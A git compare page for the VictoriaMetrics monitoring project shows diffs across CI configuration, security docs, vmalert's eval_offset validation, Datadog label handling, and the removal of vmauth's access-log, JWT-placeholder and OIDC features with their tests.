Compare commits
2 Commits
graphite-w
...
dmc-only
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
016701841a | ||
|
|
3d4c1848dd |
23
.github/copilot-instructions.md
vendored
Normal file
@@ -0,0 +1,23 @@
|
||||
# Project Overview
|
||||
|
||||
VictoriaMetrics is a fast, cost-saving, and scalable solution for monitoring and managing time series data. It delivers high performance and reliability, making it an ideal choice for businesses of all sizes.
|
||||
|
||||
## Folder Structure
|
||||
|
||||
- `/app`: Contains the compilable binaries.
|
||||
- `/lib`: Contains the golang reusable libraries
|
||||
- `/docs/victoriametrics`: Contains documentation for the project.
|
||||
- `/apptest/tests`: Contains integration tests.
|
||||
|
||||
## Libraries and Frameworks
|
||||
|
||||
- Backend: Golang, no framework. Use third-party libraries sparingly.
|
||||
- Frontend: React.
|
||||
|
||||
## Code review guidelines
|
||||
|
||||
Ensure the feature or bugfix includes a changelog entry in /docs/victoriametrics/changelog/CHANGELOG.md.
|
||||
Verify the entry is under the ## tip section and matches the structure and style of existing entries.
|
||||
Chore-only changes may be omitted from the changelog.
|
||||
|
||||
|
||||
4
.github/workflows/test.yml
vendored
@@ -86,7 +86,7 @@ jobs:
|
||||
- run: go version
|
||||
|
||||
- name: Run tests
|
||||
run: make ${{ matrix.scenario}}
|
||||
run: GOGC=10 make ${{ matrix.scenario}}
|
||||
|
||||
- name: Publish coverage
|
||||
uses: codecov/codecov-action@v5
|
||||
@@ -95,7 +95,7 @@ jobs:
|
||||
|
||||
apptest:
|
||||
name: apptest
|
||||
runs-on: apptest
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
- name: Code checkout
|
||||
|
||||
25
SECURITY.md
@@ -12,31 +12,6 @@ The following versions of VictoriaMetrics receive regular security fixes:
|
||||
|
||||
See [this page](https://victoriametrics.com/security/) for more details.
|
||||
|
||||
## Software Bill of Materials (SBOM)
|
||||
|
||||
Every VictoriaMetrics container{{% available_from "#" %}} image published to
|
||||
[Docker Hub](https://hub.docker.com/u/victoriametrics)
|
||||
and [Quay.io](https://quay.io/organization/victoriametrics)
|
||||
includes an [SPDX](https://spdx.dev/) SBOM attestation
|
||||
generated automatically by BuildKit during
|
||||
`docker buildx build`.
|
||||
|
||||
To inspect the SBOM for an image:
|
||||
|
||||
```sh
|
||||
docker buildx imagetools inspect \
|
||||
docker.io/victoriametrics/victoria-metrics:latest \
|
||||
--format "{{ json .SBOM }}"
|
||||
```
|
||||
|
||||
To scan an image using its SBOM attestation with
|
||||
[Trivy](https://github.com/aquasecurity/trivy):
|
||||
|
||||
```sh
|
||||
trivy image --sbom-sources oci \
|
||||
docker.io/victoriametrics/victoria-metrics:latest
|
||||
```
|
||||
|
||||
## Reporting a Vulnerability
|
||||
|
||||
Please report any security issues to <security@victoriametrics.com>
|
||||
|
||||
@@ -49,11 +49,6 @@ func insertRows(at *auth.Token, sketches []*datadogsketches.Sketch, extraLabels
|
||||
Name: "__name__",
|
||||
Value: m.Name,
|
||||
})
|
||||
// See https://github.com/VictoriaMetrics/VictoriaMetrics/issues/10557
|
||||
labels = append(labels, prompb.Label{
|
||||
Name: "host",
|
||||
Value: sketch.Host,
|
||||
})
|
||||
for _, label := range m.Labels {
|
||||
labels = append(labels, prompb.Label{
|
||||
Name: label.Name,
|
||||
@@ -62,6 +57,9 @@ func insertRows(at *auth.Token, sketches []*datadogsketches.Sketch, extraLabels
|
||||
}
|
||||
for _, tag := range sketch.Tags {
|
||||
name, value := datadogutil.SplitTag(tag)
|
||||
if name == "host" {
|
||||
name = "exported_host"
|
||||
}
|
||||
labels = append(labels, prompb.Label{
|
||||
Name: name,
|
||||
Value: value,
|
||||
|
||||
@@ -81,9 +81,12 @@ func (g *Group) Validate(validateTplFn ValidateTplFn, validateExpressions bool)
|
||||
if g.Interval.Duration() < 0 {
|
||||
return fmt.Errorf("interval shouldn't be lower than 0")
|
||||
}
|
||||
// if `eval_offset` is set, the group interval must be specified explicitly(instead of inherited from global evaluationInterval flag) and must bigger than offset.
|
||||
if g.EvalOffset.Duration().Abs() > g.Interval.Duration() {
|
||||
return fmt.Errorf("the abs value of eval_offset should be smaller than interval; now eval_offset: %v, interval: %v", g.EvalOffset.Duration(), g.Interval.Duration())
|
||||
if g.EvalOffset.Duration() < 0 {
|
||||
return fmt.Errorf("eval_offset shouldn't be lower than 0")
|
||||
}
|
||||
// if `eval_offset` is set, interval won't use global evaluationInterval flag and must bigger than offset.
|
||||
if g.EvalOffset.Duration() > g.Interval.Duration() {
|
||||
return fmt.Errorf("eval_offset should be smaller than interval; now eval_offset: %v, interval: %v", g.EvalOffset.Duration(), g.Interval.Duration())
|
||||
}
|
||||
if g.EvalOffset != nil && g.EvalDelay != nil {
|
||||
return fmt.Errorf("eval_offset cannot be used with eval_delay")
|
||||
|
||||
@@ -176,17 +176,11 @@ func TestGroupValidate_Failure(t *testing.T) {
|
||||
}, false, "interval shouldn't be lower than 0")
|
||||
|
||||
f(&Group{
|
||||
Name: "too big eval_offset",
|
||||
Name: "wrong eval_offset",
|
||||
Interval: promutil.NewDuration(time.Minute),
|
||||
EvalOffset: promutil.NewDuration(2 * time.Minute),
|
||||
}, false, "eval_offset should be smaller than interval")
|
||||
|
||||
f(&Group{
|
||||
Name: "too big negative eval_offset",
|
||||
Interval: promutil.NewDuration(time.Minute),
|
||||
EvalOffset: promutil.NewDuration(-2 * time.Minute),
|
||||
}, false, "eval_offset should be smaller than interval")
|
||||
|
||||
limit := -1
|
||||
f(&Group{
|
||||
Name: "wrong limit",
|
||||
|
||||
@@ -56,7 +56,7 @@ absolute path to all .tpl files in root.
|
||||
-rule.templates="dir/**/*.tpl". Includes all the .tpl files in "dir" subfolders recursively.
|
||||
`)
|
||||
|
||||
configCheckInterval = flag.Duration("configCheckInterval", 0, "Interval for checking for changes in '-rule', '-rule.templates' and '-notifier.config' files. "+
|
||||
configCheckInterval = flag.Duration("configCheckInterval", 0, "Interval for checking for changes in '-rule' or '-notifier.config' files. "+
|
||||
"By default, the checking is disabled. Send SIGHUP signal in order to force config check for changes.")
|
||||
|
||||
httpListenAddrs = flagutil.NewArrayString("httpListenAddr", "Address to listen for incoming http requests. See also -tls and -httpListenAddr.useProxyProtocol")
|
||||
|
||||
@@ -186,11 +186,6 @@ func (c *Client) run(ctx context.Context) {
|
||||
return
|
||||
case <-ticker.C:
|
||||
c.flush(ctx, wr)
|
||||
// drain the potential stale tick to avoid small or empty flushes after a slow flush.
|
||||
select {
|
||||
case <-ticker.C:
|
||||
default:
|
||||
}
|
||||
case ts, ok := <-c.input:
|
||||
if !ok {
|
||||
continue
|
||||
|
||||
@@ -31,8 +31,8 @@ var (
|
||||
"0 means no limit.")
|
||||
ruleUpdateEntriesLimit = flag.Int("rule.updateEntriesLimit", 20, "Defines the max number of rule's state updates stored in-memory. "+
|
||||
"Rule's updates are available on rule's Details page and are used for debugging purposes. The number of stored updates can be overridden per rule via update_entries_limit param.")
|
||||
resendDelay = flag.Duration("rule.resendDelay", 0, "Minimum amount of time to wait before resending an alert to notifier.")
|
||||
maxResolveDuration = flag.Duration("rule.maxResolveDuration", 0, "Limits the maximum duration for automatic alert expiration, "+
|
||||
resendDelay = flag.Duration("rule.resendDelay", 0, "MiniMum amount of time to wait before resending an alert to notifier.")
|
||||
maxResolveDuration = flag.Duration("rule.maxResolveDuration", 0, "Limits the maxiMum duration for automatic alert expiration, "+
|
||||
"which by default is 4 times evaluationInterval of the parent group")
|
||||
evalDelay = flag.Duration("rule.evalDelay", 30*time.Second, "Adjustment of the 'time' parameter for rule evaluation requests to compensate intentional data delay from the datasource. "+
|
||||
"Normally, should be equal to '-search.latencyOffset' (cmd-line flag configured for VictoriaMetrics single-node or vmselect). "+
|
||||
@@ -484,15 +484,8 @@ func (g *Group) UpdateWith(newGroup *Group) {
|
||||
// delayBeforeStart calculates delay based on Group ID, so all groups will start at different moments of time.
|
||||
func (g *Group) delayBeforeStart(ts time.Time, maxDelay time.Duration) time.Duration {
|
||||
if g.EvalOffset != nil {
|
||||
offset := *g.EvalOffset
|
||||
// adjust the offset for negative evalOffset, the rule is:
|
||||
// `eval_offset: -x` is equivalent to `eval_offset: y` for `interval: x+y`.
|
||||
// For example, `eval_offset: -6m` is equivalent to `eval_offset: 4m` for `interval: 10m`.
|
||||
if offset < 0 {
|
||||
offset += g.Interval
|
||||
}
|
||||
// if offset is specified, ignore the maxDelay and return a duration aligned with offset
|
||||
currentOffsetPoint := ts.Truncate(g.Interval).Add(offset)
|
||||
currentOffsetPoint := ts.Truncate(g.Interval).Add(*g.EvalOffset)
|
||||
if currentOffsetPoint.Before(ts) {
|
||||
// wait until the next offset point
|
||||
return currentOffsetPoint.Add(g.Interval).Sub(ts)
|
||||
|
||||
@@ -606,15 +606,6 @@ func TestGroupStartDelay(t *testing.T) {
|
||||
f("2023-01-01T00:03:30.000+00:00", "2023-01-01T00:08:00.000+00:00")
|
||||
f("2023-01-01T00:08:00.000+00:00", "2023-01-01T00:08:00.000+00:00")
|
||||
|
||||
// test group with negative offset -2min, which is equivalent to 3min offset for 5min interval
|
||||
offset = -2 * time.Minute
|
||||
g.EvalOffset = &offset
|
||||
|
||||
f("2023-01-01T00:00:15.000+00:00", "2023-01-01T00:03:00.000+00:00")
|
||||
f("2023-01-01T00:01:00.000+00:00", "2023-01-01T00:03:00.000+00:00")
|
||||
f("2023-01-01T00:03:30.000+00:00", "2023-01-01T00:08:00.000+00:00")
|
||||
f("2023-01-01T00:08:00.000+00:00", "2023-01-01T00:08:00.000+00:00")
|
||||
|
||||
maxDelay = time.Minute * 1
|
||||
g.EvalOffset = nil
|
||||
|
||||
|
||||
@@ -13,7 +13,6 @@ import (
|
||||
"net/url"
|
||||
"os"
|
||||
"regexp"
|
||||
"slices"
|
||||
"sort"
|
||||
"strconv"
|
||||
"strings"
|
||||
@@ -29,7 +28,6 @@ import (
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/fasttime"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/flagutil"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/fs/fscore"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/httpserver"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/logger"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/netutil"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/procutil"
|
||||
@@ -92,8 +90,6 @@ type UserInfo struct {
|
||||
|
||||
MetricLabels map[string]string `yaml:"metric_labels,omitempty"`
|
||||
|
||||
AccessLog *AccessLog `yaml:"access_log,omitempty"`
|
||||
|
||||
concurrencyLimitCh chan struct{}
|
||||
concurrencyLimitReached *metrics.Counter
|
||||
|
||||
@@ -106,40 +102,11 @@ type UserInfo struct {
|
||||
requestsDuration *metrics.Summary
|
||||
}
|
||||
|
||||
// AccessLog represents configuration for access log settings.
|
||||
type AccessLog struct {
|
||||
Filters *AccessLogFilters `yaml:"filters"`
|
||||
}
|
||||
|
||||
// AccessLogFilters represents list of filters for access logs printing
|
||||
type AccessLogFilters struct {
|
||||
// SkipStatusCodes is a list of HTTP status codes for which access logs will be skipped
|
||||
SkipStatusCodes []int `yaml:"skip_status_codes"`
|
||||
}
|
||||
|
||||
func (ui *UserInfo) logRequest(r *http.Request, userName string, statusCode int, duration time.Duration) {
|
||||
if ui.AccessLog == nil {
|
||||
return
|
||||
}
|
||||
filters := ui.AccessLog.Filters
|
||||
if filters != nil && len(filters.SkipStatusCodes) > 0 {
|
||||
if slices.Contains(filters.SkipStatusCodes, statusCode) {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
remoteAddr := httpserver.GetQuotedRemoteAddr(r)
|
||||
requestURI := httpserver.GetRequestURI(r)
|
||||
logger.Infof("access_log request_host=%q request_uri=%q status_code=%d remote_addr=%s user_agent=%q referer=%q duration_ms=%d username=%q",
|
||||
r.Host, requestURI, statusCode, remoteAddr, r.UserAgent(), r.Referer(), duration.Milliseconds(), userName)
|
||||
}
|
||||
|
||||
// HeadersConf represents config for request and response headers.
|
||||
type HeadersConf struct {
|
||||
RequestHeaders []*Header `yaml:"headers,omitempty"`
|
||||
ResponseHeaders []*Header `yaml:"response_headers,omitempty"`
|
||||
KeepOriginalHost *bool `yaml:"keep_original_host,omitempty"`
|
||||
hasAnyPlaceHolders bool
|
||||
RequestHeaders []*Header `yaml:"headers,omitempty"`
|
||||
ResponseHeaders []*Header `yaml:"response_headers,omitempty"`
|
||||
KeepOriginalHost *bool `yaml:"keep_original_host,omitempty"`
|
||||
}
|
||||
|
||||
func (ui *UserInfo) beginConcurrencyLimit(ctx context.Context) error {
|
||||
@@ -382,7 +349,6 @@ func (bus *backendURLs) add(u *url.URL) {
|
||||
url: u,
|
||||
healthCheckContext: bus.healthChecksContext,
|
||||
healthCheckWG: &bus.healthChecksWG,
|
||||
hasPlaceHolders: hasAnyPlaceholders(u),
|
||||
})
|
||||
}
|
||||
|
||||
@@ -400,8 +366,6 @@ type backendURL struct {
|
||||
concurrentRequests atomic.Int32
|
||||
|
||||
url *url.URL
|
||||
|
||||
hasPlaceHolders bool
|
||||
}
|
||||
|
||||
func (bu *backendURL) isBroken() bool {
|
||||
@@ -878,14 +842,12 @@ func reloadAuthConfigData(data []byte) (bool, error) {
|
||||
return false, fmt.Errorf("failed to parse auth config: %w", err)
|
||||
}
|
||||
|
||||
jui, oidcDP, err := parseJWTUsers(ac)
|
||||
jui, err := parseJWTUsers(ac)
|
||||
if err != nil {
|
||||
return false, fmt.Errorf("failed to parse JWT users from auth config: %w", err)
|
||||
}
|
||||
oidcDP.startDiscovery()
|
||||
jwtc := &jwtCache{
|
||||
users: jui,
|
||||
oidcDP: oidcDP,
|
||||
users: jui,
|
||||
}
|
||||
|
||||
m, err := parseAuthConfigUsers(ac)
|
||||
@@ -904,11 +866,6 @@ func reloadAuthConfigData(data []byte) (bool, error) {
|
||||
}
|
||||
metrics.RegisterSet(ac.ms)
|
||||
|
||||
jwtcPrev := jwtAuthCache.Load()
|
||||
if jwtcPrev != nil {
|
||||
jwtcPrev.oidcDP.stopDiscovery()
|
||||
}
|
||||
|
||||
authConfig.Store(ac)
|
||||
authConfigData.Store(&data)
|
||||
authUsers.Store(&m)
|
||||
@@ -946,9 +903,6 @@ func parseAuthConfig(data []byte) (*AuthConfig, error) {
|
||||
if ui.Name != "" {
|
||||
return nil, fmt.Errorf("field name can't be specified for unauthorized_user section")
|
||||
}
|
||||
if err := parseJWTPlaceholdersForUserInfo(ui, false); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if err := ui.initURLs(); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -1006,10 +960,6 @@ func parseAuthConfigUsers(ac *AuthConfig) (map[string]*UserInfo, error) {
|
||||
at, ui.Username, ui.Name, uiOld.Username, uiOld.Name)
|
||||
}
|
||||
}
|
||||
|
||||
if err := parseJWTPlaceholdersForUserInfo(ui, false); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if err := ui.initURLs(); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -1109,7 +1059,6 @@ func (ui *UserInfo) initURLs() error {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
for _, e := range ui.URLMaps {
|
||||
if len(e.SrcPaths) == 0 && len(e.SrcHosts) == 0 && len(e.SrcQueryArgs) == 0 && len(e.SrcHeaders) == 0 {
|
||||
return fmt.Errorf("missing `src_paths`, `src_hosts`, `src_query_args` and `src_headers` in `url_map`")
|
||||
@@ -1169,9 +1118,6 @@ func (ui *UserInfo) name() string {
|
||||
h := xxhash.Sum64([]byte(ui.AuthToken))
|
||||
return fmt.Sprintf("auth_token:hash:%016X", h)
|
||||
}
|
||||
if ui.JWT != nil {
|
||||
return `jwt`
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
|
||||
@@ -4,11 +4,8 @@ import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"gopkg.in/yaml.v2"
|
||||
|
||||
@@ -279,50 +276,6 @@ users:
|
||||
url_prefix: http://foo.bar
|
||||
metric_labels:
|
||||
not-prometheus-compatible: value
|
||||
`)
|
||||
// placeholder in url_prefix
|
||||
f(`
|
||||
users:
|
||||
- username: foo
|
||||
password: bar
|
||||
url_prefix: 'http://ahost/{{a_placeholder}}/foobar'
|
||||
`)
|
||||
// placeholder in a header
|
||||
f(`
|
||||
users:
|
||||
- username: foo
|
||||
password: bar
|
||||
headers:
|
||||
- 'X-Foo: {{a_placeholder}}'
|
||||
url_prefix: 'http://ahost'
|
||||
`)
|
||||
// placeholder in url_prefix
|
||||
f(`
|
||||
users:
|
||||
- username: foo
|
||||
password: bar
|
||||
url_prefix: 'http://ahost/{{a_placeholder}}/foobar'
|
||||
`)
|
||||
// placeholder in a header in url_map
|
||||
f(`
|
||||
users:
|
||||
- username: foo
|
||||
password: bar
|
||||
url_map:
|
||||
- src_paths: ["/select/.*"]
|
||||
headers:
|
||||
- 'X-Foo: {{a_placeholder}}'
|
||||
url_prefix: 'http://ahost'
|
||||
`)
|
||||
|
||||
// placeholder in a header in url_map
|
||||
f(`
|
||||
users:
|
||||
- username: foo
|
||||
password: bar
|
||||
url_map:
|
||||
- src_paths: ["/select/.*"]
|
||||
url_prefix: 'http://ahost/{{a_placeholder}}/foobar'
|
||||
`)
|
||||
}
|
||||
|
||||
@@ -684,31 +637,6 @@ users:
|
||||
URLPrefix: mustParseURL("http://aaa:343/bbb"),
|
||||
},
|
||||
}, nil)
|
||||
|
||||
// Multiple users with access logs enabled
|
||||
f(`
|
||||
users:
|
||||
- username: foo
|
||||
url_prefix: http://foo
|
||||
access_log: {}
|
||||
- username: bar
|
||||
url_prefix: https://bar/x/
|
||||
access_log:
|
||||
filters:
|
||||
skip_status_codes: [404]
|
||||
`, map[string]*UserInfo{
|
||||
getHTTPAuthBasicToken("foo", ""): {
|
||||
Username: "foo",
|
||||
URLPrefix: mustParseURL("http://foo"),
|
||||
AccessLog: &AccessLog{},
|
||||
},
|
||||
getHTTPAuthBasicToken("bar", ""): {
|
||||
Username: "bar",
|
||||
URLPrefix: mustParseURL("https://bar/x/"),
|
||||
AccessLog: &AccessLog{Filters: &AccessLogFilters{SkipStatusCodes: []int{404}}},
|
||||
},
|
||||
}, nil)
|
||||
|
||||
}
|
||||
|
||||
func TestParseAuthConfigPassesTLSVerificationConfig(t *testing.T) {
|
||||
@@ -996,41 +924,6 @@ func TestDiscoverBackendIPsWithIPV6(t *testing.T) {
|
||||
|
||||
}
|
||||
|
||||
func TestLogRequest(t *testing.T) {
|
||||
ui := &UserInfo{AccessLog: &AccessLog{}}
|
||||
|
||||
testOutput := &bytes.Buffer{}
|
||||
logger.SetOutputForTests(testOutput)
|
||||
defer logger.ResetOutputForTest()
|
||||
|
||||
req, err := http.NewRequest("GET", "http://localhost:8080/select/0/prometheus", nil)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %s", err)
|
||||
}
|
||||
|
||||
f := func(user string, status int, duration time.Duration, expectedLog string) {
|
||||
t.Helper()
|
||||
|
||||
testOutput.Reset()
|
||||
ui.logRequest(req, user, status, duration)
|
||||
|
||||
got := testOutput.String()
|
||||
if expectedLog == "" && got != "" {
|
||||
t.Fatalf("expected empty log, got %q", got)
|
||||
}
|
||||
if !strings.Contains(got, expectedLog) {
|
||||
t.Fatalf("output \n%q \nshould contain \n%q", testOutput.String(), expectedLog)
|
||||
}
|
||||
}
|
||||
|
||||
f("foo", 200, 10*time.Millisecond, `access_log request_host="localhost:8080" request_uri="" status_code=200 remote_addr="" user_agent="" referer="" duration_ms=10 username="foo"`)
|
||||
f("foo", 404, time.Second, `access_log request_host="localhost:8080" request_uri="" status_code=404 remote_addr="" user_agent="" referer="" duration_ms=1000 username="foo"`)
|
||||
|
||||
ui.AccessLog.Filters = &AccessLogFilters{SkipStatusCodes: []int{200}}
|
||||
f("foo", 200, 10*time.Millisecond, ``)
|
||||
f("foo", 404, 10*time.Millisecond, `access_log request_host="localhost:8080" request_uri="" status_code=404 remote_addr="" user_agent="" referer="" duration_ms=10 username="foo"`)
|
||||
}
|
||||
|
||||
func getRegexs(paths []string) []*Regex {
|
||||
var sps []*Regex
|
||||
for _, path := range paths {
|
||||
|
||||
@@ -116,20 +116,6 @@ users:
|
||||
- "http://default1:8888/unsupported_url_handler"
|
||||
- "http://default2:8888/unsupported_url_handler"
|
||||
|
||||
# A JWT token based routing:
|
||||
# - Requests with JWT token that has the following structure:
|
||||
# {"team": "ops", "security": {"read_access": "1"}, "vm_access": {"metrics_account_id": 1000,"metrics_project_id":5}}
|
||||
# is routed to vmselect nodes and request url placeholder replaced with metrics tenant identificators
|
||||
- name: jwt-opts-team
|
||||
jwt:
|
||||
match_claims:
|
||||
team: ops
|
||||
security.read_access: "1"
|
||||
skip_verify: true
|
||||
url_prefix:
|
||||
- "http://vmselect1:8481/select/{{.MetricsTenant}}/prometheus"
|
||||
- "http://vmselect2:8481/select/{{.MetricsTenant}}/prometheus"
|
||||
|
||||
# Requests without Authorization header are proxied according to `unauthorized_user` section.
|
||||
# Requests are proxied in round-robin fashion between `url_prefix` backends.
|
||||
# The deny_partial_response query arg is added to all the proxied requests.
|
||||
@@ -139,8 +125,3 @@ unauthorized_user:
|
||||
- http://vmselect-az1/?deny_partial_response=1
|
||||
- http://vmselect-az2/?deny_partial_response=1
|
||||
retry_status_codes: [503, 500]
|
||||
# log access for requests routed to this user
|
||||
access_log:
|
||||
filters:
|
||||
# except requests with Status Codes below
|
||||
skip_status_codes: [200, 202]
|
||||
|
||||
@@ -2,110 +2,49 @@ package main
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/url"
|
||||
"os"
|
||||
"slices"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/jwt"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/logger"
|
||||
)
|
||||
|
||||
const (
|
||||
metricsTenantPlaceholder = `{{.MetricsTenant}}`
|
||||
metricsExtraLabelsPlaceholder = `{{.MetricsExtraLabels}}`
|
||||
metricsExtraFiltersPlaceholder = `{{.MetricsExtraFilters}}`
|
||||
|
||||
logsAccountIDPlaceholder = `{{.LogsAccountID}}`
|
||||
logsProjectIDPlaceholder = `{{.LogsProjectID}}`
|
||||
logsExtraFiltersPlaceholder = `{{.LogsExtraFilters}}`
|
||||
logsExtraStreamFiltersPlaceholder = `{{.LogsExtraStreamFilters}}`
|
||||
|
||||
placeholderPrefix = `{{`
|
||||
)
|
||||
|
||||
var allPlaceholders = []string{
|
||||
metricsTenantPlaceholder,
|
||||
metricsExtraLabelsPlaceholder,
|
||||
metricsExtraFiltersPlaceholder,
|
||||
logsAccountIDPlaceholder,
|
||||
logsProjectIDPlaceholder,
|
||||
logsExtraFiltersPlaceholder,
|
||||
logsExtraStreamFiltersPlaceholder,
|
||||
}
|
||||
|
||||
var urlPathPlaceHolders = []string{
|
||||
metricsTenantPlaceholder,
|
||||
logsAccountIDPlaceholder,
|
||||
logsProjectIDPlaceholder,
|
||||
}
|
||||
|
||||
type jwtCache struct {
|
||||
// users contain UserInfo`s from AuthConfig with JWTConfig set
|
||||
users []*UserInfo
|
||||
|
||||
oidcDP *oidcDiscovererPool
|
||||
}
|
||||
|
||||
type JWTConfig struct {
|
||||
PublicKeys []string `yaml:"public_keys,omitempty"`
|
||||
PublicKeyFiles []string `yaml:"public_key_files,omitempty"`
|
||||
SkipVerify bool `yaml:"skip_verify,omitempty"`
|
||||
OIDC *oidcConfig `yaml:"oidc,omitempty"`
|
||||
MatchClaims map[string]string `yaml:"match_claims,omitempty"`
|
||||
parsedMatchClaims []*jwt.Claim
|
||||
PublicKeys []string `yaml:"public_keys,omitempty"`
|
||||
PublicKeyFiles []string `yaml:"public_key_files,omitempty"`
|
||||
SkipVerify bool `yaml:"skip_verify,omitempty"`
|
||||
|
||||
// verifierPool is used to verify JWT tokens.
|
||||
// It is initialized from PublicKeys and/or PublicKeyFiles.
|
||||
// In this case, it is initialized once at config reload and never updated until next reload
|
||||
// In case of OIDC, it is initialized on config reload and periodically updated by discovery process.
|
||||
verifierPool atomic.Pointer[jwt.VerifierPool]
|
||||
verifierPool *jwt.VerifierPool
|
||||
}
|
||||
|
||||
func parseJWTUsers(ac *AuthConfig) ([]*UserInfo, *oidcDiscovererPool, error) {
|
||||
func parseJWTUsers(ac *AuthConfig) ([]*UserInfo, error) {
|
||||
jui := make([]*UserInfo, 0, len(ac.Users))
|
||||
oidcDP := &oidcDiscovererPool{}
|
||||
|
||||
uniqClaims := make(map[string]*UserInfo)
|
||||
var sortedClaims []string
|
||||
for idx, ui := range ac.Users {
|
||||
for _, ui := range ac.Users {
|
||||
jwtToken := ui.JWT
|
||||
if jwtToken == nil {
|
||||
continue
|
||||
}
|
||||
|
||||
if ui.AuthToken != "" || ui.BearerToken != "" || ui.Username != "" || ui.Password != "" {
|
||||
return nil, nil, fmt.Errorf("auth_token, bearer_token, username and password cannot be specified if jwt is set")
|
||||
return nil, fmt.Errorf("auth_token, bearer_token, username and password cannot be specified if jwt is set")
|
||||
}
|
||||
if len(jwtToken.PublicKeys) == 0 && len(jwtToken.PublicKeyFiles) == 0 && !jwtToken.SkipVerify && jwtToken.OIDC == nil {
|
||||
return nil, nil, fmt.Errorf("jwt must contain at least a single public key, public_key_files, oidc or have skip_verify=true")
|
||||
if len(jwtToken.PublicKeys) == 0 && len(jwtToken.PublicKeyFiles) == 0 && !jwtToken.SkipVerify {
|
||||
return nil, fmt.Errorf("jwt must contain at least a single public key, public_key_files or have skip_verify=true")
|
||||
}
|
||||
var claimsString string
|
||||
sortedClaims = sortedClaims[:0]
|
||||
parsedClaims := make([]*jwt.Claim, 0, len(jwtToken.MatchClaims))
|
||||
for ck, cv := range jwtToken.MatchClaims {
|
||||
sortedClaims = append(sortedClaims, fmt.Sprintf("%s=%s", ck, cv))
|
||||
parsedClaims = append(parsedClaims, jwt.NewClaim(ck, cv))
|
||||
}
|
||||
ui.JWT.parsedMatchClaims = parsedClaims
|
||||
sort.Strings(sortedClaims)
|
||||
claimsString = strings.Join(sortedClaims, ",")
|
||||
|
||||
if oldUI, ok := uniqClaims[claimsString]; ok {
|
||||
return nil, nil, fmt.Errorf("duplicate match claims=%q found for name=%q at idx=%d; the previous one is set for name=%q", claimsString, ui.Name, idx, oldUI.Name)
|
||||
}
|
||||
uniqClaims[claimsString] = &ui
|
||||
if len(jwtToken.PublicKeys) > 0 || len(jwtToken.PublicKeyFiles) > 0 {
|
||||
keys := make([]any, 0, len(jwtToken.PublicKeys)+len(jwtToken.PublicKeyFiles))
|
||||
|
||||
for i := range jwtToken.PublicKeys {
|
||||
k, err := jwt.ParseKey([]byte(jwtToken.PublicKeys[i]))
|
||||
if err != nil {
|
||||
return nil, nil, err
|
||||
return nil, err
|
||||
}
|
||||
keys = append(keys, k)
|
||||
}
|
||||
@@ -113,52 +52,30 @@ func parseJWTUsers(ac *AuthConfig) ([]*UserInfo, *oidcDiscovererPool, error) {
|
||||
for _, filePath := range jwtToken.PublicKeyFiles {
|
||||
keyData, err := os.ReadFile(filePath)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("cannot read public key from file %q: %w", filePath, err)
|
||||
return nil, fmt.Errorf("cannot read public key from file %q: %w", filePath, err)
|
||||
}
|
||||
k, err := jwt.ParseKey(keyData)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("cannot parse public key from file %q: %w", filePath, err)
|
||||
return nil, fmt.Errorf("cannot parse public key from file %q: %w", filePath, err)
|
||||
}
|
||||
keys = append(keys, k)
|
||||
}
|
||||
|
||||
vp, err := jwt.NewVerifierPool(keys)
|
||||
if err != nil {
|
||||
return nil, nil, err
|
||||
return nil, err
|
||||
}
|
||||
|
||||
jwtToken.verifierPool.Store(vp)
|
||||
}
|
||||
if jwtToken.OIDC != nil {
|
||||
if len(jwtToken.PublicKeys) > 0 || len(jwtToken.PublicKeyFiles) > 0 || jwtToken.SkipVerify {
|
||||
return nil, nil, fmt.Errorf("jwt with oidc cannot contain public keys or have skip_verify=true")
|
||||
}
|
||||
|
||||
if jwtToken.OIDC.Issuer == "" {
|
||||
return nil, nil, fmt.Errorf("oidc issuer cannot be empty")
|
||||
}
|
||||
isserURL, err := url.Parse(jwtToken.OIDC.Issuer)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("oidc issuer %q must be a valid URL", jwtToken.OIDC.Issuer)
|
||||
}
|
||||
if isserURL.Scheme != "https" && isserURL.Scheme != "http" {
|
||||
return nil, nil, fmt.Errorf("oidc issuer %q must have http or https scheme", jwtToken.OIDC.Issuer)
|
||||
}
|
||||
|
||||
oidcDP.createOrAdd(ui.JWT.OIDC.Issuer, &ui.JWT.verifierPool)
|
||||
}
|
||||
|
||||
if err := parseJWTPlaceholdersForUserInfo(&ui, true); err != nil {
|
||||
return nil, nil, err
|
||||
jwtToken.verifierPool = vp
|
||||
}
|
||||
|
||||
if err := ui.initURLs(); err != nil {
|
||||
return nil, nil, err
|
||||
return nil, err
|
||||
}
|
||||
|
||||
metricLabels, err := ui.getMetricLabels()
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("cannot parse metric_labels: %w", err)
|
||||
return nil, fmt.Errorf("cannot parse metric_labels: %w", err)
|
||||
}
|
||||
ui.requests = ac.ms.GetOrCreateCounter(`vmauth_user_requests_total` + metricLabels)
|
||||
